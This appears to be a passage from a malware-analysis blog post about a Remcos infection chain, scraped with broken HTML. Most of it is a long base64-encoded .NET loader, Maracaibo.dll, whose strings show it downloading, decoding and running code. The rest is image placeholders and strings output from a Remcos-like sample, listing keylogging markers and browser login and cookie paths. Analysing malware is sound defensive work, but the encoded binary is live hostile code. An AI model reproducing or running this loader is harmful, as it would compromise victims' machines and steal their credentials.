KAAAAKCAAAAo4Q\/\/\/\/\/4MAAD+CQAAewsAAAQgJVDEHWUgskcrHWEglxfvAFj+CQAAewsAAASOaW9bAAAKJioAEzAHAOEAAAATAAAR\/gkBAG9cAAAKOMAAAAD+CQEAb1cAAAr+DgEAOEwAAAD+DAEA\/gwAAP4MAQD+DAAAk\/4JAAB7CwAABP4JAgAg\/PUlGyCyfD0PWSATc+cAYSD0a3bcWWYgQWI\/KGEgzANY+Vlfkf4JAgBgYdGd\/gwAACD\/NeXcZSDDKpT2WCABAAAAYiBjA3EbWSAPmhDwYSBvzS32WSBGUTEOWFkl\/g4AACBbgHQtIAjwTQJYIOvOAihZZSACAAAAYiDfhf4eWGY8BQAAADgOAAAAOFL\/\/\/\/+DgAAODf\/\/\/\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bBA0AAAAAAAMAxgEFAYIBDwAAAAAAAwDGAQABoQQPAAAAAAADAMYB9gCrBBEA8C8AAAAAkRguB6oAEgAQMAAAAACBGCgHEwASABQxAAAAAIYAcwDeBBIAAAABAJIGAAABAHMAAAABAIIAAAABAFEEAAABADEJAAACAAQFAAADAGEAAAAEAEEAAAAFADsAAAAGADMAAAABAJ4AAAACAMsAAAABAFUEAAACAFsEAAABAPsEAAACANgIAAABABQJAAABAMAEAAACAOsECQAoBxMAEQAoBxcAGQAoBzYAKQAoBxMAMQAoBxMASQBaCXIASQA3BncAUQC2CIAASQAoB4QADAAoBxMAFAAoBxMAHAAoBxMAJAAoBxMASQCkBbUASQAoB70AWQAoBxMADAB1AMQASQCzBbUAFAB1AMQAHAB1AMQAJAB1AMQAYQAoB\/QAaQAoBxMAcQAoBxMAeQBIBFIBOQB+CFcBOQDqAGABiQAoBxMAgQAeAW0BOQC5BIIBmQDbAI8BOQAoBxMAoQAoB6oBNABzABQCPAA0BMQAPAA+BDoCPAAoBxMAsQAoB0UCOQB1CGACgQCCCWYCuQAoB2sCSQCOCIkCSQBrCIkCSQCuCI8C0QAoBxMA2QAoBxMA6QC2APQC4QAoBxMACQGFCKID+QBLCKcD+QBWAYIBCQHeBoIBCQGkCa0D8QAoB\/QACQH0BoIBCQGfBYIBEQHIBLADCQHECLQDCQHECLoDGQFNCcADCQHECMYDIQFjBc0D8QBNAYIBMQEOB9cDMQH8BqoAIQHLCN0DOQHUBOMDCQHECOoDSQHfCPIDSQHyCAMESQFMBRIEWQFpBSQEAQEoBxMAaQEhACsEAQFyBDEEcQG\/ATgEAQGqBD0ECQHTAEIEeQHvBUgEgQGZBE4EeQGxAFQEyQCEAVsEgQDDAGEEkQEFAWgEiQC5BIIBIQFiCW8ECQF2CZAECQEoB5UEyQCPCcQEyQB+BckEwQGsANAECQHiBGAB0QEoB+QE2QEoBxMA4QEoBxEF8QEoB\/QA+QEoB\/QAAQIoB\/QACQIoB\/QAEQIoB\/QAGQIoB\/QAIQIoB\/QAKQIoB\/QAMQIoB\/QAOQIoBxMAKQCzAPkALgDrAukELgDzAvIELgD7AhgFLgADAyEFLgALA0oCLgATA0oCLgAbAyEFLgAjAzQFLgArA0oCLgAzAUoCLgAzA0wFLgA7A3YFLgBDA4UFLgBLA0UAQAArAEUAQAAbADwAQwATAB0AQwAbADwASQCzAA8BYwATAB0AYwAbADwAaQCzACgBgAArAEUAgwC7AEUAgwDDAEUAgwATAB0AiQCzADoBoAArAEUAowAbADwAowALAbIBwAArAEUAwwAbADwAwwAzAUoCyQAbAKAC4AArAEUA4wC7AEUA4wATAK4C4wBrAUUA4wBzAUUA4wDDAEUA6QAbAKACAAEbADwAAAErAEUAAwFzAUUAAwETAAoDAwEbAKACIAEbADwAIAErAEUAIwG7AEUAIwHDAEUAIwFrAUUAIwFzAUUAKQGzAGQDQAEbADwAQAErAEUAYAEbADwAYAErAEUAgAErAEUAoAErAEUAwAErAEUAwAEbADwA4AErAEUAAAIrAEUAAAIbADwAagCuAM4A2wDlAE4BXAFkAXkBhgEcAlgCdwKEAvsCdQOKBL4E2AQEAAEABgAFAAcABgAIAAgACQAJAAAAVQTvAAAAWwQKAQAAwAQjAQAA6wQ1AQAAggBAAgAAngCbAgAAywCpAgAAggAFAwAAcwAFAwIABAADAAIABQAFAAIABgAHAAIABwAJAAIADwALAAIAEQANAAIAEgAPAAEAEwAPAAIAFgARAAIAFwATAI4AlQCcAKMAjAEkAisCMgIEgAAACQAJAAkAhAMAAAAAAABqBgAABAAAAAAAAAAAAAAAAQB7AAAAAAAEAAAAAAAAAAAAAAABAJgFAAAAAAoAAAAAAAAAAAAAAAoAigAAAAAAAAAAAAEAAAAeCAAAuAAAAAIAAACqCQAABQAEAAYABAAMAAsADQALAAAAEAAMAHMAAAAQABkAcwAAAAAAGwBzAD8AlQE\/ADUCAAAAYmAxAENvbnRleHRWYWx1ZWAxAENsYXNzMQBJbnQzMgBnZXRfVVRGOAA8TW9kdWxlPgBQSHh2UGpKAE1ibXZLAENMQmJic04AU3lzdGVtLklPAE1zcUJJYlkAZ2V0X2EAUGRqTHZmYQBQcm9qZWN0RGF0YQBnZXRfYgBtc2NvcmxpYgBnZXRfYwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAZ2V0X2QAc2V0X2QAUmVhZABMb2FkAFN5bmNocm9uaXplZABHZXRNZXRob2QAZ2V0X2UAUmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBHZXRIYXNoQ29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUARmlsZQBBcHBXaW5TdHlsZQBNc2dCb3hTdHlsZQBnZXRfTmFtZQBnZXRfUHJvY2Vzc05hbWUARGF0ZVRpbWUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBNZXRob2RCYXNlAEFwcGxpY2F0aW9uQmFzZQBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBTdHJSZXZlcnNlAE11bHRpY2FzdERlbGVnYXRlAEVkaXRvckJyb3dzYWJsZVN0YXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUASGVscEtleXdvcmRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3VwcHJlc3NJbGRhc21BdHRyaWJ1dGUARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAZ2V0X2YAZ2V0X2cATmV3TGF0ZUJpbmRpbmcAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBnZXRfaABHZXRUZW1wUGF0aABHZXRGb2xkZXJQYXRoAGdldF9MZW5ndGgAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBlTU96TUJsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABNYXJhY2FpYm8uZGxsAFNoZWxsAHNldF9TZWN1cml0eVByb3RvY29sAEdldE1hbmlmZXN0UmVzb3VyY2VTdHJlYW0AU3lzdGVtAFRyaW0Ab3BfR3JlYXRlclRoYW4Ab3BfTGVzc1RoYW4AVGltZVNwYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASW50ZXJhY3Rpb24Ab3BfU3VidHJhY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQXJndW1lbnRFeGNlcHRpb24ATWFyYWNhaWJvAE1ldGhvZEluZm8ARmlsZUluZm8AQ3VsdHVyZUluZm8AU3BlY2lhbEZvbGRlcgBSZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBUb1VwcGVyAFVzZXIAQ29tcHV0ZXIAVG9Mb3dlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBNYXJhY2FpYm8uTXkuUmVzb3VyY2VzAE1hcmFjYWliby5SZXNvdXJjZXMucmVzb3VyY2VzAERlYnVnZ2luZ01vZGVzAEdldFByb2Nlc3NlcwBTdHJpbmdzAE15U2V0dGluZ3MAQWRkTW9udGhzAFJlZmVyZW5jZUVxdWFscwBDb250YWlucwBBZGRZZWFycwBSdW50aW1lSGVscGVycwBQcm9jZXNzAEFkZERheXMAZ2V0X1RvdGFsRGF5cwBDb25jYXQAQ3JlYXRlT2JqZWN0AG9iamVjdABMYXRlR2V0AFN5c3RlbS5OZXQATGF0ZVNldABJQXN5bmNSZXN1bHQATXNnQm94UmVzdWx0AHJlc3VsdABXZWJDbGllbnQARW52aXJvbm1lbnQAdVVPV1RxdABDb252ZXJ0AFN5c3RlbS5UZXh0AFdyaXRlQWxsVGV4dABnZXRfTm93AE1zZ0JveABNYXJhY2FpYm8uTXkAVG9DaGFyQXJyYXkAZ2V0X0Fzc2VtYmx5AEdldEV4ZWN1dGluZ0Fzc2VtYmx5AEVtcHR5AEtiU0p6AAAnsuee543nnuec557nlued55Dn0eet55rnjOeQ54rnjeec55rnjOcBA8nrARHD4djhweHa4drh2eHG4dHhARXl6NrowejH6Mbo0ujf6PHo3OjL6AEHDeQZ5AjkAQn95aXlseWg5QEFmOSB5AEHver56uDqAQPM8gGAu9nnieeY547nieeY593nwOfd57PnmOeK59DntOeJ55jnkOet54\/nkueN55jnj+eJ54Tn3efQ563nnOeJ55Xn3eff57Xntue+56jnx+eh567nsue756nnque856\/nuOeh57DnlOee54\/nkueO55Lnm+eJ56HnqueU55PnmeeS54rnjueh577niOeP54\/nmOeT54nnq+eY54\/njueU55Lnk+eh56\/niOeT59\/n3efQ57PnnOeQ55jn3eff5wFlNfU39Tr1QfV29Xv1YvVy9Tf1NfVH9Xj1YPVy9WX1ZPV\/9XL1e\/V79Tn1cvVv9XL1N\/U69UD1fvV59XP1ePVg9UT1Y\/Vu9Xv1cvU39X\/1fvVz9XP1cvV59Tf1NfU19TH1N\/Uw9QFpxeHF4Y\/hk+HL4d\/hzuGa4Z3hn+Gf4Z\/hneGQ4e3hz+HS4c3h2OHP4cnhxOHp4cThzeHY4Z3hn+Hu4cnhz+HU4dPh2uGf4Z3hkOHb4dLhz+He4djhhuGd4cbhmeHJ4djhzuHJ4djhwOEBDwLnAudL51TnCucJ50vnAYCZi+yU7IzsnuyJ7Ijsk+ye7Jfsl+zV7J7sg+ye7NvsqOye7I\/s1uy+7IPsnuyY7I7sj+yS7JTsleyr7JTsl+yS7Jjsguzb7LnsguyL7JrsiOyI7Nvs1uyo7JjslOyL7J7s2+yr7InslOyY7J7siOyI7NvswOzb7IvslOyM7J7sieyI7JPsnuyX7Jfs2+zW7J3skuyX7J7s2+wBNaPivOKk4rbioeKg4rvituK\/4r\/i\/eK24qvituLz4pDivOKj4qri\/uKa4qfituK+4vPi9OIBIUTwQ\/BO8CfwBvAQ8BfwCvAN8ALwF\/AK8AzwDfBD8ETwAQNE7QFZZPhS+EP4F\/hY+FX4Xfhk+F\/4Uvhb+Fv4F\/gK+Bf4dPhF+FL4VvhD+FL4ePhV+F34UvhU+EP4H\/gV+GD4RPhU+EX4XvhH+EP4GfhE+F\/4Uvhb+Fv4Ffge+AGApXf3cPcV9xj3EPcp9xL3H\/cW9xb3VPcI9w\/3FPda91j3CvcV9w33H\/cI9wn3Evcf9xb3Fvda91f3LfcT9xT3HvcV9w33KfcO9wP3Fvcf91r3EvcT9x73Hvcf9xT3WvdX9xn3FfcX9xf3G\/cU9x73WvcN9wn3GfcI9xP3CvcO91T3H\/cC9x\/3WvdV91X3GPda91X3VfcU9xX3FvcV9x33Ffda9133ARla9l\/2XfZR9k32UfZd9hv2HPYR9g72GPYBD6vnq+fh5\/3npeex56DnAQOJ8gEbgOaE5rTmpea+5qfmo+b55oTmv+ay5rvmu+YBAQAdvPaN9pr2nvaL9pr2rPaX9pD2jfaL9pz2ivaL9gEDufYBCfDrsuuw67XrARVx60TrV+tC60DrUet160TrUetN6wEVBfYa9gL2EPYH9gb2HfYQ9hn2GfYBEzT4B\/gS+AD4GPgQ+Bv4AfgG+AFv0veo95b3kfeb95D3iPes94v3hveT95r33\/eX95b3m\/eb95r3kfff99L3nPeQ95L3kvee95H3m\/ff94j3jPec9433lveP94v30fea94f3mvff99D30Ped99\/30PfQ95H3kPeT95D3mPeQ99\/32PcBGez1xvXK9cv16fXK9cb1xPXR9cz1yvXL9QEjtOuQ65zrmuuY64\/rmOuO69PrmeuR65Hr0evd68zrzOvF6wEX5PTa9N301\/Tc9MT04PTH9Mr03\/TW9AEJxPH28eHx8vEBRYvo3+iF6NXoiOjX6MroiOjP6MvokujK6Nzoz+iS6Mno2OjT6JPo0+jU6N\/oyejF6NjoyeiS6JLoh+jO6M3oyejJ6NXoAQPgxAEDousBC4ftje297Y7tp+0BRRHiCOIV4g3iH+IX4hviCOI84ibiLuI\/4jTiVOIO4hziFeIJ4hXiCOIZ4hPiN+Im4gniDeIV4h7iFOIT4i3iJuJA4jniAReD74vvie+K74nvlO+K75Tvju\/M7+bvARud5pHmiuad5pHmlub85pzmoea65rDmkOaV5gENU+Zt5lPmWOZe5mbmARn58vfywPLC8vby0\/LG8tbyi\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ACQNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\r\n<\/pre>\n
![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_-1024x713.png\")
<\/a><\/p>\n\n
![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-1024x640.png\")
<\/a><\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-1024x400.png\")
<\/a><\/p>\n\n
\n
![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-1024x453.png\")
<\/a><\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos.png\")
<\/a><\/p>\n\r\n- strings paste.ee.exe | grep "^\\[.*"\r\n[End of clipboard]\r\n[Ctrl+V]\r\n[Text pasted from clipboard]\r\n[Ctrl+\r\n[AltL]\r\n[AltR]\r\n[CtrlL]\r\n[CtrlR]\r\n[End of clipboard]\r\n[Text copied to clipboard]\r\n[Chrome StoredLogins not found]\r\n[Chrome StoredLogins found, cleared!]\r\n[Chrome Cookies not found]\r\n[Chrome Cookies found, cleared!]\r\n[Firefox StoredLogins not found]\r\n[Firefox StoredLogins Cleared!]\r\n[Firefox Cookies not found]\r\n[Firefox cookies found, cleared!]\r\n[IE cookies not found]\r\n[IE cookies cleared!]\r\n[Cleared browsers logins and cookies.]\r\n\r\n- strings paste.ee.exe | grep "AppData.*"\r\n\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\r\n\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies\r\n\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\r\n<\/pre>\n
File Analysis
